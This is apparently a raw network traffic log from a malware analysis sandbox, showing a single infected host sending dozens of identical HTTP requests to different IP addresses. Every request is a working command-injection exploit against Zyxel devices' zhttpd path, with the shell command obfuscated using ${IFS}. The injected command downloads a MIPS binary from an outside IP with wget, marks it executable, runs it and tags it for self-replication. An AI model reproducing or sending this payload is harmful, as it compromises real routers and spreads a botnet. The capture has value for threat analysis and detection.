                                      Jan 14, 2024 15:50:48.355600119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4962192.168.2.143690443.202.182.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355654001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4963192.168.2.144757084.159.254.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355704069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4964192.168.2.145128227.162.11.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355761051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4965192.168.2.145399661.28.255.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355813980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4966192.168.2.1457264175.62.103.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355871916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4967192.168.2.1433518131.76.28.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355931997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4968192.168.2.1435142124.28.242.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355977058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4969192.168.2.1449490199.140.0.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.360800982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4970192.168.2.1444904136.203.229.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.360841036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4971192.168.2.144179685.109.81.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.360908985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4972192.168.2.1449888120.156.37.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.360972881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4973192.168.2.1437540193.155.31.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360194921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4974192.168.2.144088469.141.214.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360399008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4975192.168.2.143509466.110.40.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360460043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4976192.168.2.145317452.13.45.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360531092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4977192.168.2.1437542180.23.231.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360594034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4978192.168.2.145553648.156.198.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360632896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4979192.168.2.1442060110.124.14.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360692978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4980192.168.2.1455788154.101.105.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360729933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4981192.168.2.1433824177.217.243.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360797882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4982192.168.2.1449968161.98.34.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360866070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4983192.168.2.1455706193.139.178.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360896111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4984192.168.2.1451688219.193.152.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.360933065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4985192.168.2.144782899.185.60.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361028910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4986192.168.2.1434998164.13.169.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361067057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4987192.168.2.1458310108.9.36.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361118078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4988192.168.2.1432932193.34.184.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361145973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4989192.168.2.145046412.192.7.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361185074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4990192.168.2.1438426191.90.218.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361249924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4991192.168.2.143977481.106.58.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361341953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4992192.168.2.1445418137.8.143.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361392975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4993192.168.2.143701874.212.254.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361433029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4994192.168.2.143664084.54.216.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361490011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4995192.168.2.144529289.219.188.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361550093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4996192.168.2.1449512171.8.9.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361622095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4997192.168.2.14400361.187.76.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361697912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4998192.168.2.1454498171.37.207.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361747026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4999192.168.2.1451534151.60.202.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361785889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5000192.168.2.1450508200.213.151.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361891031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5001192.168.2.1453356180.249.48.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361928940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5002192.168.2.1454662155.47.136.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.361984015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5003192.168.2.144337235.229.211.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362039089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5004192.168.2.1455320129.46.154.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362087965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5005192.168.2.1435142149.148.230.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362169981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5006192.168.2.143364644.32.63.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362210989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5007192.168.2.1435534110.92.149.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362248898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5008192.168.2.1454588186.139.248.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362313032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5009192.168.2.1451722104.4.50.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362369061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5010192.168.2.145033838.114.183.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362430096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5011192.168.2.1460478119.145.203.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362452984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5012192.168.2.1434178197.118.75.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362505913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5013192.168.2.145213666.104.209.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362571001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5014192.168.2.1450272181.200.127.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362618923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5015192.168.2.1455338206.66.20.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362684965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5016192.168.2.1446762150.19.208.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362761021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5017192.168.2.145043699.51.94.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362831116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5018192.168.2.1437190123.46.173.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362899065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5019192.168.2.144944483.94.159.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.362960100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5020192.168.2.144504457.144.76.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363049984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5021192.168.2.144156264.148.59.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363100052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5022192.168.2.145812661.70.25.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363162041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5023192.168.2.145153699.204.212.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363217115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5024192.168.2.1449122116.129.211.162443
                                      TimestampBytes transferredDirectionData
